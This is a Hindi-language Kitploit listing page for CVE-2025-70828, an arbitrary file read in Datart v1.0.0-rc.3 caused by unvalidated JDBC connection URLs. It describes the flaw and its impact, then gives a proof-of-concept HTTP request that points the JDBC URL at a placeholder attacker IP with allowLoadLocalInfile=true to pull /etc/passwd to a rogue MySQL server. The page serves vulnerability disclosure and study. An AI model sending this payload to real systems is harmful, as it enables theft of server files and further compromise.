Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-70828 — Datart v1.0.0-rc.3 JDBC Connection String Injection से मनमाना फ़ाइल पढ़ना | Kitploit
उपकरण/GitHubGitHub/xiaoxiaoranxxx/cve-2025-70828
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubxiaoxiaoranxxx/cve-2025-70828

CVE-2025-70828

Datart v1.0.0-rc.3 JDBC Connection String Injection से मनमाना फ़ाइल पढ़ना

रिपॉजिटरी देखें
46 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-70828

सारांश

Datart v1.0.0-rc.3 में एक मनमाना फ़ाइल पढ़ने की कमज़ोरी पाई गई। डेटा स्रोत कॉन्फ़िगरेशन के दौरान एप्लिकेशन JDBC कनेक्शन URL को ठीक से मान्य नहीं करता है।

कमज़ोरी का विवरण

कमज़ोरी का प्रकार: अनुचित इनपुट सत्यापन (CWE-20) / मनमाना फ़ाइल पढ़ना प्रभावित संस्करण: Datart v1.0.0-rc.3 गंभीरता: उच्च (संवेदनशील जानकारी के प्रकट होने की संभावना)

विवरण

यह कमज़ोरी डेटा स्रोत कॉन्फ़िगरेशन मॉड्यूल में मौजूद है। एप्लिकेशन JDBC कॉन्फ़िगरेशन में url पैरामीटर को कड़ाई से सैनिटाइज़ नहीं करता है। एक दूरस्थ हमलावर जिसके पास डेटा स्रोतों को कॉन्फ़िगर करने के अधिकार हैं, वह JDBC URL में दुर्भावनापूर्ण पैरामीटर (विशेष रूप से allowLoadLocalInfile=true) इंजेक्ट कर सकता है।

JDBC कनेक्शन को हमलावर द्वारा नियंत्रित एक दुर्भावनापूर्ण MySQL सर्वर (Rogue MySQL Server) पर इंगित करके, हमलावर क्लाइंट को Datart सर्वर से स्थानीय फ़ाइलों को हमलावर के सर्वर पर भेजने के लिए ट्रिगर कर सकता है।

प्रभाव

सफल शोषण एक प्रमाणित हमलावर को सर्वर फ़ाइल सिस्टम (जैसे, /etc/passwd, कॉन्फ़िगरेशन फ़ाइलें, स्रोत कोड) से मनमानी फ़ाइलें पढ़ने की अनुमति देता है, जिससे संभावित रूप से सर्वर से समझौता या आगे के हमले हो सकते हैं।

प्रूफ़ ऑफ़ कॉन्सेप्ट (PoC)

  1. सेटअप: हमलावर एक दुर्भावनापूर्ण MySQL सर्वर सेट करता है जो LOAD DATA LOCAL INFILE सुविधा का शोषण करने में सक्षम है (जैसे, rogue_mysql_server जैसे टूल का उपयोग करके)।
  2. शोषण: हमलावर कनेक्शन का परीक्षण करने के लिए Datart सर्वर को निम्नलिखित अनुरोध भेजता है:
root@kitploit:~
POST /api/v1/data-provider/test HTTP/1.1
Host: {{TARGET_HOST}}
Content-Type: application/json
Authorization: Bearer {{VALID_JWT_TOKEN}}
Accept: application/json

{
  "name": "cve-poc-test",
  "type": "JDBC",
  "properties": {
    "dbType": "MYSQL",
    "url": "jdbc:mysql://{{ATTACKER_IP}}:{{ATTACKER_PORT}}/test?allowLoadLocalInfile=true&allowUrlInLocalInfile=true&maxAllowedPacket=655360",
    "user": "fileread_/etc/passwd",
    "password": "any_password",
    "driverClass": "com.mysql.cj.jdbc.Driver",
    "serverAggregate": false,
    "enableSpecialSQL": false,
    "enableSyncSchemas": true,
    "syncInterval": "60",
    "properties": {}
  }
}
टूल डाउनलोड करें